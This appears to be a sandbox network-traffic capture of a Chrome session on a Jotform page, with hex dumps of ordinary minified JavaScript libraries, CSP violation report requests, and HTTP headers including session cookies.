                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC942INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 35 32 34 31 2e 31 66 30 35 37 30 31 63 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 5241.1f05701c.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 6d 32 34 3d 63 2c 74 2e 6d 33 34 3d 76 2c 74 2e 6d 34 34 3d 62 7d 65 6c 73 65 7b 69 66 28 36 21 3d 3d 72 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 53 53 4d 61 74 72 69 78 3a 20 65 78 70 65 63 74 69 6e 67 20 61 6e 20 41 72 72 61 79 20 6f 66 20 36 2f 31 36 20 76 61 6c 75 65 73 2e 22 29 3b 76 61 72 20 5f 3d 72 5b 30 5d 2c 77 3d 72 5b 31 5d 2c 53 3d 72 5b 32 5d 2c 6b 3d 72 5b 33 5d 2c 41 3d 72 5b 34 5d 2c 78 3d 72 5b 35 5d 3b 74 2e 6d 31 31 3d 5f 2c 74 2e 61 3d 5f 2c 74 2e 6d 31 32 3d 77 2c 74 2e 62 3d 77 2c 74 2e 6d 32 31 3d 53 2c 74 2e 63 3d 53 2c 74 2e 6d 32 32 3d 6b 2c 74 2e 64 3d 6b 2c 74 2e 6d 34 31 3d 41 2c 74 2e 65 3d 41 2c 74 2e 6d 34 32 3d 78 2c 74 2e 66 3d 78 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63
                                                                                                                                                                                                                                            Data Ascii: m24=c,t.m34=v,t.m44=b}else{if(6!==r.length)throw new TypeError("CSSMatrix: expecting an Array of 6/16 values.");var _=r[0],w=r[1],S=r[2],k=r[3],A=r[4],x=r[5];t.m11=_,t.a=_,t.m12=w,t.b=w,t.m21=S,t.c=S,t.m22=k,t.d=k,t.m41=A,t.e=A,t.m42=x,t.f=x}return t}func
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 2b 65 29 7d 29 29 29 6e 3d 6e 2e 74 72 61 6e 73 6c 61 74 65 28 6c 2c 75 2c 63 29 3b 65 6c 73 65 20 69 66 28 22 74 72 61 6e 73 6c 61 74 65 22 3d 3d 3d 69 26 26 6c 26 26 76 6f 69 64 20 30 3d 3d 3d 63 29 6e 3d 6e 2e 74 72 61 6e 73 6c 61 74 65 28 6c 2c 75 7c 7c 30 2c 30 29 3b 65 6c 73 65 20 69 66 28 22 72 6f 74 61 74 65 33 64 22 3d 3d 3d 69 26 26 68 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 2b 65 29 7d 29 29 26 26 66 29 6e 3d 6e 2e 72 6f 74 61 74 65 41 78 69 73 41 6e 67 6c 65 28 6c 2c 75 2c 63 2c 66 29 3b 65 6c 73 65 20 69 66 28 22 72 6f 74 61 74 65 22 3d 3d 3d 69 26 26 6c 26 26 5b 75 2c 63 5d 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69
                                                                                                                                                                                                                                            Data Ascii: +e)})))n=n.translate(l,u,c);else if("translate"===i&&l&&void 0===c)n=n.translate(l,u||0,0);else if("rotate3d"===i&&h.every((function(e){return!Number.isNaN(+e)}))&&f)n=n.rotateAxisAngle(l,u,c,f);else if("rotate"===i&&l&&[u,c].every((function(e){return voi
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 3d 79 2c 6e 2e 6d 31 33 3d 66 3b 76 61 72 20 6d 3d 75 2a 66 2a 68 2b 6c 2a 70 3b 6e 2e 6d 32 31 3d 6d 2c 6e 2e 63 3d 6d 3b 76 61 72 20 67 3d 6c 2a 68 2d 75 2a 66 2a 70 3b 72 65 74 75 72 6e 20 6e 2e 6d 32 32 3d 67 2c 6e 2e 64 3d 67 2c 6e 2e 6d 32 33 3d 2d 75 2a 63 2c 6e 2e 6d 33 31 3d 75 2a 70 2d 6c 2a 66 2a 68 2c 6e 2e 6d 33 32 3d 75 2a 68 2b 6c 2a 66 2a 70 2c 6e 2e 6d 33 33 3d 6c 2a 63 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 61 3d 6e 65 77 20 64 2c 69 3d 4d 61 74 68 2e 73 71 72 74 28 65 2a 65 2b 74 2a 74 2b 72 2a 72 29 3b 69 66 28 30 3d 3d 3d 69 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 6f 3d 65 2f 69 2c 73 3d 74 2f 69 2c 6c 3d 72 2f 69 2c 75 3d 6e 2a 28 4d 61 74 68 2e 50 49 2f 33 36 30 29 2c 63 3d 4d 61 74 68 2e
                                                                                                                                                                                                                                            Data Ascii: =y,n.m13=f;var m=u*f*h+l*p;n.m21=m,n.c=m;var g=l*h-u*f*p;return n.m22=g,n.d=g,n.m23=-u*c,n.m31=u*p-l*f*h,n.m32=u*h+l*f*p,n.m33=l*c,n}function o(e,t,r,n){var a=new d,i=Math.sqrt(e*e+t*t+r*r);if(0===i)return a;var o=e/i,s=t/i,l=r/i,u=n*(Math.PI/360),c=Math.
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 34 2a 74 2e 6d 34 33 2c 72 2e 6d 33 31 2a 74 2e 6d 31 34 2b 72 2e 6d 33 32 2a 74 2e 6d 32 34 2b 72 2e 6d 33 33 2a 74 2e 6d 33 34 2b 72 2e 6d 33 34 2a 74 2e 6d 34 34 2c 72 2e 6d 34 31 2a 74 2e 6d 31 31 2b 72 2e 6d 34 32 2a 74 2e 6d 32 31 2b 72 2e 6d 34 33 2a 74 2e 6d 33 31 2b 72 2e 6d 34 34 2a 74 2e 6d 34 31 2c 72 2e 6d 34 31 2a 74 2e 6d 31 32 2b 72 2e 6d 34 32 2a 74 2e 6d 32 32 2b 72 2e 6d 34 33 2a 74 2e 6d 33 32 2b 72 2e 6d 34 34 2a 74 2e 6d 34 32 2c 72 2e 6d 34 31 2a 74 2e 6d 31 33 2b 72 2e 6d 34 32 2a 74 2e 6d 32 33 2b 72 2e 6d 34 33 2a 74 2e 6d 33 33 2b 72 2e 6d 34 34 2a 74 2e 6d 34 33 2c 72 2e 6d 34 31 2a 74 2e 6d 31 34 2b 72 2e 6d 34 32 2a 74 2e 6d 32 34 2b 72 2e 6d 34 33 2a 74 2e 6d 33 34 2b 72 2e 6d 34 34 2a 74 2e 6d 34 34 5d 29 7d 76 61 72 20 64
                                                                                                                                                                                                                                            Data Ascii: 4*t.m43,r.m31*t.m14+r.m32*t.m24+r.m33*t.m34+r.m34*t.m44,r.m41*t.m11+r.m42*t.m21+r.m43*t.m31+r.m44*t.m41,r.m41*t.m12+r.m42*t.m22+r.m43*t.m32+r.m44*t.m42,r.m41*t.m13+r.m42*t.m23+r.m43*t.m33+r.m44*t.m43,r.m41*t.m14+r.m42*t.m24+r.m43*t.m34+r.m44*t.m44])}var d
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 20 46 6c 6f 61 74 36 34 41 72 72 61 79 2e 66 72 6f 6d 28 6e 28 74 68 69 73 2c 65 29 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 65 2e 69 73 32 44 3b 72 65 74 75 72 6e 28 74 3f 22 6d 61 74 72 69 78 22 3a 22 6d 61 74 72 69 78 33 64 22 29 2b 22 28 22 2b 65 2e 74 6f 46 6c 6f 61 74 36 34 41 72 72 61 79 28 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 2b 22 29 22 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 65 2e 69 73 32 44 2c 72 3d 65 2e 69 73 49 64 65 6e 74 69 74 79 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 65 2c 7b 69 73 32 44 3a 74 2c 69 73 49
                                                                                                                                                                                                                                            Data Ascii: Float64Array.from(n(this,e))},d.prototype.toString=function(){var e=this,t=e.is2D;return(t?"matrix":"matrix3d")+"("+e.toFloat64Array(t).join(", ")+")"},d.prototype.toJSON=function(){var e=this,t=e.is2D,r=e.isIdentity;return Object.assign({},e,{is2D:t,isI
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 3a 61 2c 52 6f 74 61 74 65 3a 69 2c 52 6f 74 61 74 65 41 78 69 73 41 6e 67 6c 65 3a 6f 2c 53 63 61 6c 65 3a 73 2c 53 6b 65 77 58 3a 75 2c 53 6b 65 77 59 3a 63 2c 53 6b 65 77 3a 6c 2c 4d 75 6c 74 69 70 6c 79 3a 66 2c 66 72 6f 6d 41 72 72 61 79 3a 65 2c 66 72 6f 6d 4d 61 74 72 69 78 3a 74 2c 66 72 6f 6d 53 74 72 69 6e 67 3a 72 2c 74 6f 41 72 72 61 79 3a 6e 7d 29 3b 76 61 72 20 70 3d 22 31 2e 30 2e 33 22 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 64 2c 7b 56 65 72 73 69 6f 6e 3a 70 7d 29 2c 64 7d 28 29 7d 2c 39 36 37 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 2c 6f 3d 5b 22 22 2c 22 77 65 62 6b 69 74 22 2c 22 4d 6f 7a 22 2c
                                                                                                                                                                                                                                            Data Ascii: :a,Rotate:i,RotateAxisAngle:o,Scale:s,SkewX:u,SkewY:c,Skew:l,Multiply:f,fromArray:e,fromMatrix:t,fromString:r,toArray:n});var p="1.0.3";return Object.assign(d,{Version:p}),d}()},96724:function(e){!function(t,r,n,a){"use strict";var i,o=["","webkit","Moz",
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 5b 69 5d 5d 3d 74 5b 6e 5b 69 5d 5d 29 2c 69 2b 2b 3b 72 65 74 75 72 6e 20 65 7d 29 2c 22 65 78 74 65 6e 64 22 2c 22 55 73 65 20 60 61 73 73 69 67 6e 60 2e 22 29 2c 79 3d 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 28 65 2c 74 2c 21 30 29 7d 29 2c 22 6d 65 72 67 65 22 2c 22 55 73 65 20 60 61 73 73 69 67 6e 60 2e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 2c 61 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 28 6e 3d 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 61 29 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 6e 2e 5f 73 75 70 65 72 3d 61 2c 72 26 26 69 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                            Data Ascii: [i]]=t[n[i]]),i++;return e}),"extend","Use `assign`."),y=p((function(e,t){return v(e,t,!0)}),"merge","Use `assign`.");function m(e,t,r){var n,a=t.prototype;(n=e.prototype=Object.create(a)).constructor=e,n._super=a,r&&i(n,r)}function g(e,t){return function
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 74 29 2c 49 3d 22 74 6f 75 63 68 22 2c 6a 3d 22 6d 6f 75 73 65 22 2c 4c 3d 32 34 2c 4e 3d 5b 22 78 22 2c 22 79 22 5d 2c 42 3d 5b 22 63 6c 69 65 6e 74 58 22 2c 22 63 6c 69 65 6e 74 59 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 3b 74 68 69 73 2e 6d 61 6e 61 67 65 72 3d 65 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 3d 74 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 65 2e 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 74 61 72 67 65 74 3d 65 2e 6f 70 74 69 6f 6e 73 2e 69 6e 70 75 74 54 61 72 67 65 74 2c 74 68 69 73 2e 64 6f 6d 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 62 28 65 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 2c 5b 65 5d 29 26 26 72 2e 68 61 6e 64 6c 65 72 28 74 29 7d 2c 74 68 69 73 2e 69 6e 69 74
                                                                                                                                                                                                                                            Data Ascii: t),I="touch",j="mouse",L=24,N=["x","y"],B=["clientX","clientY"];function U(e,t){var r=this;this.manager=e,this.callback=t,this.element=e.element,this.target=e.options.inputTarget,this.domHandler=function(t){b(e.options.enable,[e])&&r.handler(t)},this.init
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 6e 67 74 68 3a 72 2e 70 72 65 76 49 6e 70 75 74 2e 6d 61 78 50 6f 69 6e 74 65 72 73 3a 74 2e 70 6f 69 6e 74 65 72 73 2e 6c 65 6e 67 74 68 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 69 2c 6f 2c 73 3d 65 2e 6c 61 73 74 49 6e 74 65 72 76 61 6c 7c 7c 74 2c 6c 3d 74 2e 74 69 6d 65 53 74 61 6d 70 2d 73 2e 74 69 6d 65 53 74 61 6d 70 3b 69 66 28 38 21 3d 74 2e 65 76 65 6e 74 54 79 70 65 26 26 28 6c 3e 32 35 7c 7c 73 2e 76 65 6c 6f 63 69 74 79 3d 3d 3d 61 29 29 7b 76 61 72 20 63 3d 74 2e 64 65 6c 74 61 58 2d 73 2e 64 65 6c 74 61 58 2c 66 3d 74 2e 64 65 6c 74 61 59 2d 73 2e 64 65 6c 74 61 59 2c 64 3d 47 28 6c 2c 63 2c 66 29 3b 6e 3d 64 2e 78 2c 69 3d 64 2e 79 2c 72 3d 75 28 64 2e 78 29 3e 75 28 64 2e 79 29 3f 64 2e 78 3a 64 2e 79 2c 6f 3d
                                                                                                                                                                                                                                            Data Ascii: ngth:r.prevInput.maxPointers:t.pointers.length,function(e,t){var r,n,i,o,s=e.lastInterval||t,l=t.timeStamp-s.timeStamp;if(8!=t.eventType&&(l>25||s.velocity===a)){var c=t.deltaX-s.deltaX,f=t.deltaY-s.deltaY,d=G(l,c,f);n=d.x,i=d.y,r=u(d.x)>u(d.y)?d.x:d.y,o=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            102192.168.2.1749816104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC806OUTPOST /opt/csp-violation-report.php HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 922
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: application/csp-report
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: report
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC922OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 77 6f 72 6b 65 72 2d 73 72 63 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 77 6f 72 6b 65 72 2d 73 72 63 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 64 65 66 61 75 6c 74 2d 73 72 63 20 68 74 74 70 73 3a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 77 73 73 3a 20
                                                                                                                                                                                                                                            Data Ascii: {"csp-report":{"document-uri":"https://eu.jotform.com/app/250092704521347","referrer":"https://eu.jotform.com/app/250092704521347","violated-directive":"worker-src","effective-directive":"worker-src","original-policy":"default-src https: data: blob: wss:
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1170INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            jf-trace-id: 6867d35fe69d9779
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:22 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb656a82dc35a-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            103192.168.2.1749817104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC806OUTPOST /opt/csp-violation-report.php HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 795
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: application/csp-report
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: report
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC795OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 77 6f 72 6b 65 72 2d 73 72 63 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 77 6f 72 6b 65 72 2d 73 72 63 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 64 65 66 61 75 6c 74 2d 73 72 63 20 68 74 74 70 73 3a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 77 73 73 3a 20
                                                                                                                                                                                                                                            Data Ascii: {"csp-report":{"document-uri":"https://eu.jotform.com/app/250092704521347","referrer":"https://eu.jotform.com/app/250092704521347","violated-directive":"worker-src","effective-directive":"worker-src","original-policy":"default-src https: data: blob: wss:
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1170INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            jf-trace-id: 04b785cd955203b4
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:22 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb656be3241e9-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            104192.168.2.1749818104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC398OUTGET /s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC462INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 2813454
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:38:09 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Tue, 03 Dec 2024 13:39:59 GMT
                                                                                                                                                                                                                                            etag: "c46d7d8f56170a6d8f5a410c401bccf5"
                                                                                                                                                                                                                                            Age: 103
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6570ca4437a-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC907INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 73 74 61 72 74 20 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 73 20 74 68 65 20 65 6e 74 69 72 65 20 6c 69 63 65 6e 73 65 20 6e 6f 74 69 63 65 20 66 6f 72 20 74 68 65 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 63 6f 64 65 20 69 6e 20 74 68 69 73 20 70 61 67 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 4d 6f 7a 69 6c 6c 61 20 46 6f 75 6e 64 61 74 69 6f 6e 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69
